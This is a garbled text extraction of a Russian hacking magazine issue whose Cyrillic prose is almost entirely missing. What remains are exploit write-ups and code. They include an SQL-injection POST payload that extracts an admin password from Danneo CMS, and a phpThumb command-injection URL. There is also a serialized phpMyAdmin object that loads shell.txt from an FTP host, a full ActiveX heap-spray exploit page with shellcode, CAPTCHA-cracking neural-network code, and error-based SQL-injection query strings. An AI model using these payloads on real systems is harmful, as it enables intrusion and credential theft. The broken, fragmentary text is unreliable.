CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\
DisableTaskMgr .
5.
, , (Default),
:
HKEY_CLASSES_ROOT\exefile\shell\open\command
HKEY_CLASSES_ROOT\exefile\shell\runas\command
"%1" %*.
. ,
, wuauclt.exe /
detectnow, . , .
, LiveCD-, . ,
, virustotal.com. z
037
icq 884888, http://snipper.ru
, ! ,
. , ,
!
Bugzilla
Bugzilla advisory
01
02
BRIEF Gnome-screensaver
GNOME, , ,
openSUSE
. (
2.28.2 )
, , ,
.
.
GNOME-SCREENSAVER
, dk_
window_begin_implicit_paint() ( GTK+),
-
:)
EXPLOIT (
) - vigilance.fr:
1. (
);
2. ;
3. ;
4. ,
.
Enter, , ,
.
TARGETS gnome-screensaver <=2.28.2
SOLUTION ( 2.28.3)
live.gnome.org/GnomeScreensaver/.
038
PHPTHUMB
function SafeExec($command) {
$AllowedExecFunctions = array('shell_exec'=>true,
'passthru'=>true, 'system'=>true, 'exec'=>true);
switch ($execfunction) {
case 'passthru':
case 'system':
ob_start();
$execfunction($command);
$returnvalue = ob_get_contents();
ob_end_clean();
break;
case 'exec':
X 04 /135/ 10
sql Danneo
CMS
SHELLCODE'A ,
ASCII
$output = array();
$lastline =
Danneo CMS
$execfunction($command, $output);
$returnvalue = implode("\n", $output);
break;
case 'shell_exec':
ob_start();
$returnvalue = $execfunction($command);
ob_end_clean();
break;
}
PHP
(, , , disable_functions
, , , passthru).
,
.
. phpThumb,
.
phpthumb.class.php:
function ImageMagickThumbnailToGD() {
X 04 /135/ 10
case 'blur':
if ($this->ImageMagickSwitchAvailable('blur')) {
@list($radius) = explode('|', $parameter);
$radius = ($radius ? $radius : 1);
$commandline .= ' -blur '.$radius;
unset($this->fltr[$filterkey]);
}
break;
$this->DebugMessage('ImageMagick called as
('.$commandline.')', __FILE__, __LINE__);
$IMresult = phpthumb_functions::SafeExec($commandline
);
039
gnome-screensaver
:
$radius, $commandline, SafeExec();
- DebugMessage()
.
, ImageMagick
( blur"):
site.com/phpThumb.php?fltr[]=blur|5
- (
1 9, ):
http://site.com/phpThumb.php?phpThumbDebug=9
,
,
phpThumb.
EXPLOIT , . , ,
,
. *nix
:
http://site.com/phpThumb_1.7.9/phpThumb.
php?src=/home/site.com/public_html/kartinka.
040
SVN gnome-screensaver-svn
, . ,
Windows http://snipper.ru/view/8/
phpthumb-179-arbitrary-command-execution-exploit.
phpThumb
$PHPTHUMB_CONFIG['prefer_imagemagick'] = false;
PHP
disable_functions.
03
phpThumb
comment VALUES
(NULL,'".$id."','".$usermain['useri
d']."','".NEWTIME."',
'$comname','$comtitle','$comtext','".
REMOTE_ADDRS."')");
, $comtitle 255 ,
( -
041
WordPress
\', \ ")
$comtext. ,
./base/danneo.track.php, , , :
$baddata = array("UNION",
"OUTFILE",
"FROM",
"SELECT",
"WHERE",
"SHUTDOWN",
"UPDATE",
"DELETE",
"CHANGE",
"MODIFY",
"RENAME",
"RELOAD",
"ALTER",
"GRANT",
"DROP",
"INSERT",
"CONCAT",
"cmd,
"exec",
"--"
);
foreach($_REQUEST as $params => $inputdata){
foreach($baddata as $badkey => $badvalue){
if(is_string($inputdata) &&
eregi($badvalue,$inputdata)){ $badcount=1; }
}
}
][ , , ,
, ereg[i]
-,
$comtext, -
042
42
. Danneo, ./
base/danneo.function.php:
if(!ini_get("register_globals") || (@get_cfg_
var('register_globals')==1)){
//@import_request_variables('GPC');
@extract($_COOKIE,EXTR_SKIP);
@extract($_POST,EXTR_SKIP);
@extract($_GET,EXTR_SKIP);
@extract($_REQUEST,EXTR_SKIP);
if(get_magic_quotes_gpc()) {
if($_POST) $_POST = stripslashesall($_POST);
if($_GET) $_GET = stripslashesall($_GET);
if($_REQUEST) $_REQUEST = stripslashesall($_REQUEST);
if($_COOKIE) $_COOKIE = stripslashesall($_COOKIE);
}
, magic_quotes
stripslashesall() (
, $comtitle
$comtext SQL- ),
- :)
EXPLOIT :
1. $comname , 5-10 ;
2. $comtitle 254 ( magic_
quotes = off, \");
3. $comtext /*[NULL BYTE]*/, (SELECT adpwd FROM dn052_admin LIMIT 1), 1)-- POST- :
comname=lololo&comtitle=[254 ]'&comtext=/*\
x00*/, (SELECT adpwd FROM dn052_admin LIMIT 1), 1)--&id=[ID ]&ajax=0&re=comment
, SQL-
:
X 04 /135/ 10
WordPress
.
http://www.inj3ct0r.com/
exploits/11004.
04
WORDPRESS
BRIEF ,
, WordPress,
.
, 2.9 (trash) . , - ,
, ,
,
.
, , ,
.
./wp-includes/query.php, , publish:
if ( ('publish' != $status) ) {
if ( ! is_user_logged_in() ) {
// User must be logged in to view unpublished
posts.
$this->posts = array();
} else {
if (in_array($status, array('draft', 'pending'))
){
, :
1. ;
2. draft pending,
trash .
EXPLOIT , ,
trash- advisory http://tmacuk.co.uk/?p=180.
TARGETS WordPress 2.9, 2.9.1
X 04 /135/ 10
SOLUTION ,
http://wordpress.org/download.
05
BUGZILLA
BRIEF
Bugzilla -, (,
https://bugzilla.mozilla.org).
,
.
,
.htaccess, ,
,
.
process_bug.cgi ( 249 ):
foreach my $group (@{$bug->product_obj->groups_valid})
, $bug->product_obj"
,
,
,
. , ,
, .
EXPLOIT
:
1. CVS/,
contrib/, docs/en/xml/, t/" old-params.txt,
;
2. ,
,
( ),
.
advisory
bugzilla.org/security/3.0.10.
TARGETS
: Bugzilla < 3.0.11, < 3.2.6, < 3.4.5, <3.5.3
: Bugzilla 3.3.1 3.4.4 3.5.1, 3.5.2
SOLUTION Bugzilla
: http://www.bugzilla.org/download (
.htaccess
). z
043
primat.isu@gmail.com
DVD
dvd
,
xakep.ru,
,
.
2.0
,
.
,
,
. CAPTCHA Completely Automated Public Turing test
to tell Computers and Humans Apart.
.
044
, . ,
,
. -,
, ,
(
LiveJournal). .
, , . ,
,
, ,
30
90%, .
1000 $1, .
, , ,
( -), , , .
X 04 /135/ 10
,
.
, -
.
,
. ,
.
,
, , . ,
. PageRank ,
, ,
.
,
, , .
,
-. , 1%, ,
100 .
. , 6 ,
(10 + 26) ^ 6 2
., .
, ,
, , , 10 .
,
. ( ?),
. ,
.
: , .
,
,
. ,
,
. ,
,
. ,
X 04 /135/ 10
4 (16x24 )
, .
,
- . ,
, . - .
, , . xakep.ru,
. , 10000
, .
, , , .
: , ,
, . ,
, .
,
, -, , -,
.
5% . , 20-
.
. .
. , 100 .
,
,
,
.
, . ,
, ,
(,
2716.jpg). , PHP Python,
Matlab,
. PHP,
image, imagecolorat. , ,
,
:
class Xakep_CAPTCHA
{
//
045
""
protected function colordist($color1, $color2)
{
return sqrt(pow((($color1 >> 16) & 0xFF)
- (($color2 >> 16) & 0xFF), 2)
+ pow((($color1 >> 8) & 0xFF)
- (($color2 >> 8) & 0xFF), 2)
+ pow(($color1 & 0xFF)
- ($color2 &
0xFF), 2));
}
// , ,
// 200
protected function update_mask()
{
$this->mask = array();
for ($i = 0; $i < $this->width; $i++)
for ($j = 0; $j < $this->height; $j++)
$this->mask[$i][$j] = $this->colordist
(imagecolorat($this->image, $i, $j),
$this->bg_color) > 200 ? 1 : 0;
}
, -,
, , -,
.
, ,
.
.
xakep.ru (~19 )
(16x24 ) . , , .
,
.
.
, .
( )
.
046
, (
). ,
4 ,
,
,
. : x, y (
) d
.
, .
, ,
,
. :
( ).
,
( ).
,
.
,
,
.
, . ,
(,
).
() ,
. ,
. ,
..
x, y d, .
:
//
,
, .
.
90%
- . 4
(16x24 ):
protected function divide_digits($params)
{
$this->digits = array();
for ($i = 0; $i < $this->digits_quantity; $i++)
{
//
$this->digits[$i]['image'] =
imagecreatetruecolor($this->digit_width,
$this->digit_height);
$this->digits[$i]['width'] = $this->digit_width;
$this->digits[$i]['height'] = $this->digit_height;
for ($x = 0; $x < $this->digit_width; $x++)
{
for ($y = 0; $y < $this->digit_height; $y++)
{
// , ""
$d = round($params['d'] * ($y / $this->digit_
height));
$co lor = imagecolorat($this->image, $x +
$this->digit_kerning * $i + $d + $params['x'], $y +
$params['y']);
imagesetpixel($this->digits[$i]['image'], $x, $y,
$color);
}
}
}
}
.
, .
, .
(
X 04 /135/ 10
). . ,
0 1.
:
. ,
. (feedforward ),
( )
().
( )
(, ).
: , .
. , , ,
,
.
,
Fast Artificial Neural
Network (www.leenissen.dk/fann). ,
. :
//
// :
// 1.
// 2. (1 )
// 3.
$ann = fann_create(array(384, 150, 10), 1, 0.7);
//
// :
// 1.
// 2. (, ,
)
// 3.
// 4.
// 5. ,
384, 150 10 .
() (1624
= 384) , 0 1 ( ), , 10
0 1, :
, , .
, , ,
,
.
,
047
RAZ0R HTTP://RAZ0R.NAME
, :
function train()
{
$dir = "samples/";
$set = array();
if ($dh = opendir($dir))
{
while (($file = readdir($dh)) !== false)
{
if (filetype($dir.$file) == 'file')
{
$answer = str_replace('.jpg', '', $file);
$xc = new Xakep_CAPTCHA($dir.$file,
'ann.data', 4, $answer);
$out = $xc->parse();
$set []= $xc->sample;
}
}
closedir($dh);
}
$ann = fann_create(array(384, 150, 10), 1, 0.7);
fann_train($ann, $set, 10000, 0.001, 100);
fann_save($ann, 'ann.data');
}
100 43% ,
3% (0.43 ^ 4), .
100 , 55% 10% . ,
1-2
,
10-20 . , , ,
. :
function test()
{
$dir = "test/";
$c = 0;
$wins = 0;
if ($dh = opendir($dir))
{
048
, ,
, .
,
, . xakep.ru
? -, , ,
. -, ,
,
. -,
6,
.
. , , , ,
SMS ( Google ).
, ,
. ,
,
OpenID-, .z
X 04 /135/ 10
RECAPTCHA
,
,
reCAPTCHA (recaptcha.net). reCAPTCHA
. ,
,
. ,
, , ,
. reCAPTCHA ,
,
,
.. OCR-. ,
reCAPTCHA
, . reCAPTCHA
,
.
(ocr-research.org.ua)
. ,
,
.
-,
( ). -,
X 04 /135/ 10
,
, ,
. ,
. ,
,
.
.
,
,
.
mail.ru.
.
.
.
, ,
,
: ,
.
.
, ,
, .
.
:
,
. ,
, mail.ru
.
(
brightcove.newscientist.com/services/player/
bcpid2227271001?bctid=47814603001).
(,
) ,
.
.
,
.
,
. ,
,
.
,
,
. ,
(
),
.
,
.
049
icq 884888, http://snipper.ru
UNSERIALIZE
, ! ][
PHP
. ,
unserialize .
,
, -
.
!
Piwik phpMyAdmin.
PIWIK
Piwik.
, Piwik -, Google analytics.
phpMyVisites (phpmyvisites.us).
: ( WordPress), API (
xml, json, php, csv),
, ( drag and drop-), , real time-
- (
250 ).
, Piwik
sourceforge.net "Infoworld Bossie Award"
. ,
unserialize Piwik.
ZEND FRAMEWORK
,
PHP- Zend
Framework , ,
unserialize().
, Piwik - :)
,
050
( 0.4.5
).
./core/Cookie.php :
protected function loadContentFromCookie()
{
$cookieStr = $_COOKIE[$this->name];
$values = explode(
self::VALUE_SEPARATOR, $cookieStr);
foreach($values as $nameValue){
...
if(!is_numeric($varValue)){
$varValue = base64_decode($varValue);
// some of the values may be serialized
array so we try to...
if(($arrayValue=@unserialize($varValue))
!==false
// we set the unserialized version only
for arrays...
&& is_array($arrayValue)
)
{
$varValue = $arrayValue;
}
...
}
X 04 /135/ 10
advisory phpMyAdmin
phpMyAdmin
HTTP://WWW
links
, , , :
"=",
, ;
base64_decode() (, ,
-)
unserialize().
(, )
, Zend Framework.
:)
PDF ,
,
Zend_Log.
./libs/Zend/Log.php
:
public function __destruct()
{
foreach($this->_writers as $writer) {
$writer->shutdown();
}
}
shutdown() , _writers.
shutdown-.
./libs/Zend/Log/Writer/Mail.php:
public function shutdown()
{
...
if (empty($this->_eventsToMail)) {
return;
}
...
if ($this->_layout) {
...
// If an exception occurs during
rendering, convert it to a notice
// so we can avoid an exception
thrown without a stack frame.
try {
$this->_mail->setBodyHtml($this->_
layout->render());
} catch (Exception $e) {
...
try {
$this->_mail->send();
} catch (Exception $e) {
...
X 04 /135/ 10
}
...
}
- , ,
e-mail. , .
unserialize-.
-, ,
,
:).
, render.
Piwik_View
./core/View.php:
public function render()
{
try {
...
} catch(Exception $e) {
// can fail, for example at
installation (no plugin loaded yet)
}
...
return $this->smarty->fetch($this>template);
}
,
, ,
Smarty .
SMARTY
, Smarty PHP- , .
, fetch() ./libs/
Smarty/Smarty.class.php:
function fetch($resource_name, $cache_id =
null, ...)
{
...
if ($display && !$this->caching &&
count($this->_plugins['outputfilter']) ==
0) {
if ($this->_is_compiled($resource_
name, $_smarty_compile_path)
|| $this->_compile_
resource($resource_name, $_smarty_compile_
path))
{
include($_smarty_compile_path);
piwik.org Piwik
builds.piwik.org/?
C=M;O=D
Piwik
suspekt.org/2009/
12/09/advisory032009-piwikcookie-unserializevulnerability Piwik
Cookie unserialize()
Vulnerability
framework.zend.
com/download
Zend Framework
smarty.net
Smarty
php.net/call_user_
func_array call_
user_func_array()
suspekt.org/
downloads/Piwik_
Smarty.txt
Piwik
Smarty
suspekt.org/
downloads/Piwik_
Config.txt
Piwik
gnucitizen.org/
static/blog/2009/06/
phpmyadminrcesh.
txt phpMyAdmin '/
scripts/setup.php'
PHP Code Injection
RCE PoC v0.11
snipper.ru/view/12/
phpmyadmin2119-unserializearbitrary-php-codeexecution-exploit
phpMyAdmin <= 2.11.9
forum.antichat.ru/
thread99589-file_
exists.html
file_
exists ftp
051
Piwik
timestamp
advisory
}
} else {
...
_compile_resource :
function _compile_resource(
$resource_name,
$compile_path)
{
$_params = array('resource_name'
=> $resource_name);
if (!$this->_fetch_resource_
info($_params))
{
return false;
}
_fetch_
resource_info
:
function _fetch_resource_info(
&$params)
{
...
switch ($_resource_type) {
case 'file':
...
break;
default:
// call resource functions
to fetch the template source and
052
if ($params['get_source'])
{
$_source_return =
isset($this->_plugins['resource']
[$_resource_type]) && call_
user_func_array($this->_
plugins['resource'][$_resource_
type][0][0], array($_resource_
name, &$params['source_content'],
&$this));
...
}
! PHP-
call_user_func_array
callback- :).
call_user_func_
array :
callback-
,
.
PHP :
1. eval(), ,
, ,
call_user_func_array;
2. assert() ( eval)
, ,
3 ,
assert .
-
,
Smarty eval:
function _eval(
$code, $params=null)
{
return eval($code);
}
2 ,
.
,
PHP,
,
.
,
(
).
,
base64_encode , , evil-,
PHP- Piwik.
,
unserialize
.
PHPMYADMIN
:).
,
, ,
MySql phpMyAdmin
2.11.9 ( , ,
). ,
./scripts/setup.php
,
. ,
,
./config
( ),
.
.
, ./scripts/setup.php
,
unserialize:
if (isset($_POST['configuration'])
&& $action != 'clear')
{
// Grab previous
configuration, if it should not
be cleared
$configuration=unserialize(
$_POST['configuration']);
}
, $_
POST['configuration']
unserialize() ,
__wakeup __destruct.
- ./libraries/Config.
class.php:
function __wakeup() {
if (! $this->checkConfigSource()
X 04 /135/ 10
, phpinfo() Piwik
|| $this->source_mtime !==
filemtime($this->getSource())
|| $this->default_source_mtime !==
filemtime($this->default_source)
|| $this->error_config_file
|| $this->error_config_default_file) {
$this->settings = array();
$this->load();
$this->checkSystem();
}
...
}
,
load().
:
function load($source = null)
{
...
if (! $this->checkConfigSource()) {
return false;
}
...
if (function_exists('file_get_contents'))
{
$eval_result = eval('?>' .
trim(file_get_contents(
$this->getSource())));
} else
{
$eval_result = eval('?>' .
trim(implode("\n",
file($this->getSource()))));
}
...
}
, eval-,
PHP-
:).
getSource checkConfigSource:
function getSource() {
return $this->source;
}
...
function checkConfigSource() {
...
if (! file_exists($this->getSource()))
{
...
return false;
}
if (! is_readable($this->getSource())) {
X 04 /135/ 10
:)
...
die('Existing configuration file (' .
$this->getSource() . ') is not readable.');
}
...
$perms = @fileperms($this->getSource());
if (!($perms === false) && ($perms & 2))
{
...
die('Wrong permissions on configuration
file, should not be world writable!');
}
return true;
}
, , , . file_exists(), is_readable() fileperms()
file_get_contents() URL PHP . . PHP 5,
ftp, file_exists('ftp://ftp.com/
shell.txt') true. http
. ,
,
unserialize, $_POST['configuration']
( "source"):
INFO
info
Raz0r' raz0r.
name/obzory/novyesposoby-obxoda-wafi-php-eksploity.
unserialize-
vBulletin, ,
,
.
O:10:"PMA_Config":1:{s:6:"source";s:70:"ft
p://login:password@tvoy_host.com/www/shell.
txt";}
phpinfo(), shell.txt
ftp- "<? phpinfo();exit; ?>"
(exit; , "Fatal
error").
.
EPIC WIN
, , PHP,
, ! .
( :)
. , ,
unserialize-
,
. ! z
053
d0znpp http://oxod.ru
,
-
-,
.
,
. , ,
.
CMS, ,
. .
.
,
,
.
, ,
-,
. ,
,
, .
.
,
max_execution_time
500- . -,
.
(
054
TIFF), .
11 ,
. ,
,
.
Register_Globals=ON.
,
,
,
.
PHP
.
PHP :
max_execution_time
max_input_nesting_level
max_input_time
memory_limit
pcre.backtrack_limit (PHP>=5.2.0)
pcre.recursion_limit (PHP>=5.2.0)
post_max_size (PHP>=4.0.3)
upload_max_filesize
max_file_uploads (PHP>=5.2.12)
, , common :).
( )
php.net/manual/en/ini.list.
php. max, limit.
. ,
, :
,
PHP -.
,
, ,
max_execution_time,
memory_limit.
error_reporting=E_
ERROR , display_errors=On.
X 04 /135/ 10
GET.
max_input_nesting_
level.
max_execution_time
. , ,
.
, , ,
.
, .
64. ,
, .
:
GET
. , .
, ( ). PHP
:
function fuzz_max_uri_len($url)
{
$headers = array();
$data = array();
$left = 500; //
$right = 64000;//
$accur = 5;//,
while (($right-$left) > $accur){
$cur = ($right+$left)/2;
$data['x'] = str_repeat("x",$cur);
list($h,$c,$t) = sendGetRequest($url,
$headers, $data);
$s = intval(substr($h,9,3));
if ($s<400) {
$left=$cur;
}
else{
$right=$cur;
}
echo "\n$cur\t$s";
}
return(($right+$left)/2);
}
max_input_nesting_level
,
X 04 /135/ 10
, , max_input_nesting_level=1 ?a[][], ,
Notice,
, .
2
, Array. ,
,
-
, ,
Array. -
. ,
,
, .
,
:). ,
.
-
,
. PoC
, ,
. ,
.
,
.
HTTP://WWW
links
oxod.ru ,
,
.
php.net , .
:)
Allowed memory size exhausted. , PHP- <?php echo OK;?>.
, ?!
, . ,
, , .
PHP
055
}
}
return intval($mem);
}
GET. , :)
,
, . ,
,
. ,
?a([]x2500 )
1.2 . , ,
, memory_limit,
.
,
:
PoC . ,
,
. 20 .
memory_get_usage().
.
, a
GET. -
1 .
, ,
?a=aaa,
.
GET- (
).
?a[],
500 .
,
max_input_nesting_level.
056
auto_append_file
php.ini. ,
. :
function findMarker($content)
{
$p1 = strpos($content,
"ONsec E500 mem:");
if ($p1===false){
return 0;
}
else {
$p2=strpos($content,"#",$p1);
if ($p2===false){
return 0;
}
else {
$mem = substr($content,
$p1+15,$p2-$p1-15);
.
. ,
,
, .
, .
, POST,
.
PoC
fuzz_memory_usage().
(POST,GET,Multipart)
.
, ,
, .
,
,
, . ,
max_execution_time, .
OWASP,
dead_code. ,
, ,
. ,
-
, ,
, . ,
, . ,
.
, .
,
, .
, ,
,
. -
,
,
. , ,
, ,
, .
,
. ,
,
, . ,
,
-.
X 04 /135/ 10
GET .
PoC. 30 83
, 126 .
GET .
.
, :
1. , ,
(16^3=4096).
2. , .
3. 250 ,
, . .
,
. Multipart, . -,
, .
20 , , .
foreach($results as $key=>$value){
if ($value['path']==$path){
$unique=false;
break;
}
}
if ($unique){
$len = $p3-$p2;
$res = array('path'=>
substr($filedata,$p2,$len),'len'=>$fsize);
$results[$i]=$res;
$i++;
}
}
}
fclose($fh);
}
closedir($dh);
$size=count($results)-1;
//
for ($i = $size; $i>=0; $i--) {
for ($j = 0; $j<=($i-1); $j++)
if ($results[$j]['len']>$results[$j+1]['len']) {
$k = $results[$j];
$results[$j] = $results[$j+1];
$results[$j+1] = $k;
}
}
return $results;
,
. :
function parseResults($dir)
{
if (is_dir($dir))
{
if ($dh = opendir($dir))
{
$i=0;
$results = array();
while (($file = readdir($dh)) !== false)
{
$curFile = $dir.$file;
$fh = fopen($curFile, 'r');
$filedata = fread($fh, filesize($curFile));
$fsize = filesize($curFile);
$p1 = strpos($filedata,"Maximum execution time of ");
if ($p1 === false) {}
else{
$p2 = $p1+52;
$p3 = strpos($filedata,"</b>",$p2);
if ($p3 === false) {}
else{
$len = $p3-$p2;
$path = substr($filedata,$p2,$len);
$unique = true;
//
X 04 /135/ 10
}
}
}
, .
, .
, 126 30 .
. ,
PoC !
. ,
, ,
. ,
, .
, PoC .
. , .
, .z
057
aka Don_Huan dookie@inbox.ru
ACTIVEX
ActiveX-
. 2006
,
.
ActiveX
COM- Microsoft , ,
DLL
OLE- OCX,
, , , .
HTML <object >,
CLSID. ,
JavaScript-
ActiveXObject(..),
ProgID. CLSID
{11111111-2222-33334444-555555555555}. ProgID , ,
CLSID. CLSID, ProgID COM- .
: HTML
ActiveX ,
( :
XSS
HTML-
..),
.
,
. :
,
058
,
,
. , ,
, ActiveX
,
,
. ,
, .
,
. ActiveX-
, , .
. , ActiveX CLSID {11111111-2222-3333-4444555555555555}.
,
HKEY_CLASSES_
ROOT\CLSID\{11111111-2222-3333-4444555555555555}
Implemented Categories (
, ,
).
,
.
{7DD95802-9882-11CF-9FA900AA006C42C4}
{7DD95801-9882-11CF-9FA900AA006C42C4}
,
.
, ,
KillBit. -
HKEY_LOCAL_
X 04 /135/ 10
,
.
.
?
,
/++, , .
,
, . , .
Fuzzing-,
COMRaider [labs.idefense.com/
software/fuzzing.php]. , AXman
[digitaloffense.net/tools/axman/],
COMRaider, . ActiveX, .
, IE. , .
, .
,
, ActiveX. ,
,
, , .
. ,
,
.
fuzzing
,
X 04 /135/ 10
ExecuteCmd()?
, COMRaider.
,
COMRaider
FileMon RegMon. ,
, . COMRaider.
,
View .
Options , Edit
BuildArgs.vbs.
,
Visual Basic-. GetStrArgs(),
.
for i=100 to 10000 step 1000
parent.strs.add "String(" & i & ",
""A"")"
next
DVD
dvd
,
ActiveX, .
( !!!)
100 10000 1000. 10000,
100000. 20
.
%s %n
.
:
parent.strs.add
parent.strs.add
parent.strs.add
""B"")"
parent.strs.add
""B"")"
"""C:\31337.txt"""
"""31337"""
"""http://""+String(10000,
"""C:\""+String(10000,
.
,
.
059
SEH !
heap spray
Start,
Scan a directory for registered COM servers.
. ,
, ,
.
. ,
.
, COMRaider
,
.
, FileMon
. , ActiveX,
060
heap spray
,
: %WINDIR%\Downloaded Program
Files. 5000 .
, ,
Bulid Obj Safety Report for Selected
COMRaider
. , .
.
.
. ,
. ,
.
,
, Internet Explorer .
Start Choose from controls that should be
loadable in IE.
.
FileMon RegMon 31337. ,
,
. ,
COMRaidere,
,
Scan Selected For Strings,
file
,path,url,key,load,download,safe,read,write,file,e
xecute .. ( ) . ,
, -
X 04 /135/ 10
FileMon
COMRaider
parent.strs.add """"&stri&"""" next
Fuzz Selected. COMRaider,
,
,
-.
Begin Fuzzing,
:).
, . , .
emsmtp.dll 6- . , , Oracle Document
Capture (10.1350) (oracle.
com/technology/software/products/contentmanagement/index_dc.html), .
, .
Caused Exception,
. , ,
,
, ,
. ,
, EIP
41414141,
, SEH .
,
. ,
.
OllyDBG (ollydbg.de).
COMRaider,
Launch in Olly.
, F9,
.
Olly
,
CMP,
[ESI+180] .
ESI A
X 04 /135/ 10
""
0x41414141, ,
0x41414141+0x180=0x414142C1
,
. ,
( ).
,
41,
SEH .
, ,
, ,
,
CALL DWORD PTR DS:[ESI+CC],
ESI ,
SEH,
ESI.
, , ,
.
,
,
. ,
.
308 .
, SEH .
, 308 , 4 SEH-.
100 ,
ESI
.
COMRaider, BuildArgs.vbs:
beg=256
stri=String(beg,"0")
letter="A"
for i=(beg+4) to 500 step 4
if letter="Z" then
letter ="A"
end if
stri=stri+String(4,letter)
letter=Chr(Asc(letter)+1)
, 260
, 4
ESI. 4
, 4 ,
.
32- 4 ,
SEH. ,
:
fill= String(260, "X")
parent.strs.add """&fill&"CCCCFFFF
AAAAFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFBBBB"""
:
ESI=CCCC (43434343)
SEH=BBBB (42424242)
=AAAA (41414141)
, ESI,
CCCC , .
SEH-.
,
,
SEH-. ,
, ,
,
, ,
,
. ,
. .
,
.
( IE 6/7,
) .
(exploit-db.com/exploits/10007) SEH-
jmp esp user32.dll.
ESP ( ),
.
user32.dll
. ,
. ,
. -
061
RAZ0R HTTP://RAZ0R.NAME
while(bigbk.length<0x40000)
bigbk=bigbk+bigbk; //
//nop nop-slide
var mem=new Array();
for(i=0; i<400;i++)
mem[i]=bigbk+shell; //
nop-slide,
.
, unicode-.
. 0xAA
0xBB 0xCC 0xDD JavaScript unicode
%uBBAA %uDDCC.
JavaScript. .
, .
JavaScript :
,
. , , , ,
( perl): C:\>perl shellcodegen.pl exec
notepad. , :
<HTML>
<HEAD>
<TITLE>][akep ActiveX SEH Sploit</
TITLE>
</HEAD>
<BODY>
<OBJECT id='vuln'
classid='clsid:68AC0D5F-0424-11D5822F-00C04F6BA8D9'></object>
<SCRIPT>
function Exploit(){
// exec notepad
var shell = unescape("%ue8fc%u0089
%u0000%u8960%u31e5%u64d2%u528b%u8b3
0%u0c52%u528b%u8b14%u2872%ub70f%u26
4a%uff31%uc031%u3cac%u7c61%u2c02%uc
120%u0dcf%uc701%uf0e2%u5752%u528b%u
8b10%u3c42%ud001%u408b%u8578%u74c0%
u014a%u50d0%u488b%u8b18%u2058%ud301
%u3ce3%u8b49%u8b34%ud601%uff31%uc03
1%uc1ac%u0dcf%uc701%ue038%uf475%u7d
03%u3bf8%u247d%ue275%u8b58%u2458%ud
062
301%u8b66%u4b0c%u588b%u011c%u8bd3%u
8b04%ud001%u4489%u2424%u5b5b%u5961%
u515a%ue0ff%u5f58%u8b5a%ueb12%u5d86
%u016a%u858d%u00b9%u0000%u6850%u8b3
1%u876f%ud5ff%ue0bb%u2a1d%u680a%u95
a6%u9dbd%ud5ff%u063c%u0a7c%ufb80%u7
5e0%ubb05%u1347%u6f72%u006a%uff53%u
6ed5%u746f%u7065%u6461%u0000");
//
// 0x0d0d0d0d c 99%
var bigbk=unescape("%u9090%u9090%u
9090%u9090");
while(bigbk.length<0x40000)
bigbk=bigbk+bigbk;
var mem=new Array();
for(i=0; i<400;i++)
mem[i]=bigbk+shell;
var bf=unescape("%63"); //
var buf="";
while (buf.length<260) buf=buf+bf;
buf+=unescape("%61%61%61%61"); //
ESI
buf+="FFFF"+unescape("%62%62%62%62"
);//
buf+="THX_TO_MY_WIFE_FOR_
LOVE!FFFFFFFF";
buf+=unescape("%0d%0d%0d%0d");//SEH
vuln.SubmitToExpress(buf);
}
Exploit();
</SCRIPT>
</BODY>
</HTML>
, 308 , :
"<260>aaaaFFFFbbbbTHX_TO_
MY_WIFE_FOR_LOVE!FFFFFFFF[ SEH
]". ESI, bbbb
,
.
308 0x0d .
html-,
-
"notepad"
(,
ActiveX ).
, SEH CALL [ESI+CC]
.
:
var mem=new Array();
var i=0;
// c
var bigbk=unescape("%u0d0d%u0d0d%u
0d0d%u0d0d");
while(bigbk.length<0x40000)
bigbk=bigbk+bigbk;
for(; i<200;i++) mem[i]=bigbk+unes
cape("%u0d0d%u0d0d%u0d0d%u0d0d");
// nop-
var bigbk2=unescape("%u9090%u9090%
u9090%u9090");
while(bigbk2.length<0x40000)
bigbk2=bigbk2+bigbk2;
for(; i<400;i++)
mem[i]=bigbk2+shell;
// 0x0d0d0d0d c 99%
var bf=unescape("%63");
var buf="";
while (buf.length<260) buf=buf+bf;
//
//CALL [0x05050505+CC]
//EIP 0x0d0d0d0d.
.
f+=unescape("%05%05%05%05"); //ESI
buf+="FFFF"+unescape("%61%61%61%61"
);//
buf+="HI_TO_KONONENCHEG_
FFFFFFFFFFFFFF";
buf+=unescape("%62%62%62%62");//SEH
vuln.SubmitToExpress(buf);
. . .
, ,
FileMon,
:\31337.txt. ,
ImportBodyText,
,
. ,
,
BodyText:
. . .
vuln.ImportBodyText("C:\boot.ini");
alert(vuln.BodyText);
. . .
,
IE 6/7 ActiveX.
,
,
.
,
. , ,
,
, .
,
, ,
Digital Security Research Group.
research@dsec.ru! z
X 04 /135/ 10
(Positive Technologies) http://devteev.blogspot.com
ERROR
BASED SQL-INJECTION
ERROR-BASED
SQL-INJECTION
SQL-
, ,
(union).
. ,
?!
, SQL-,
. .
,
, , .
Qwazar "
" SQL- ,
MySQL. ,
.
MySQL >= 5.0:
064
,
( MySQL < 5.0, ),
,
rand().
, http-.
:
http://server/?id=(1)and(select+1+fr
om(select+count(*),concat((select+ta
X 04 /135/ 10
Qwazar MySQL,
3.x, -
. , , MySQL 4.1,
.
, TinKode,
blind SQL-Injection
Web- army.mil.
Web-,
MSSQL 2000/2005,
.
TinKode ,
MSSQL
, "" :
select convert(int,@@version);
Msg 245, Level 16, State 1, Line 1
Conversion failed when converting the nvarchar
value 'Microsoft SQL Server 2008 (RTM) 10.0.1600.22 (Intel X86)
Jul 9 2008 14:43:34
Copyright (c) 1988-2008 Microsoft
Corporation
Enterprise Edition on Windows NT 6.1
<X86> (Build 7600: ) (VM)
' to data type int.
, SQL-,
,
Microsoft SQL Server. ,
:
http://server/?id=(1)and(1)=(convert(i
nt,(select+table_name+from(select+row_
number()+over+(order+by+table_
name)+as+rownum,table_name+from+information_
schema.tables)+as+t+where+t.rownum=1)))-http://server/?id=(1)and(1)=(convert(i
nt,(select+table_name+from(select+row_
number()+over+(order+by+table_
name)+as+rownum,table_name+from+information_
schema.tables)+as+t+where+t.rownum=2)))-...
X 04 /135/ 10
SQL
, :
http://server/?id=(1)and(1)=cast
((select+table_name+from+information_schema.
tables+limit+1+offset+0)+as+numeric)-http://server/?id=(1)and(1)=cast
((select+table_name+from+information_schema.
tables+limit+1+offset+1)+as+numeric)-...
WARNING
warning
!
!
,
!
SQL-,
065
, .
, .
:
MSSQL
TinKode MSSQL/2008
Oracle. ,
.
, error-based blind SQL
Injection ,
XML. ,
XMLType(),
(LPX-00XXX):
SQL> select XMLType((select
'abcdef' from dual)) from dual;
ERROR:
ORA-31011: XML parsing failed
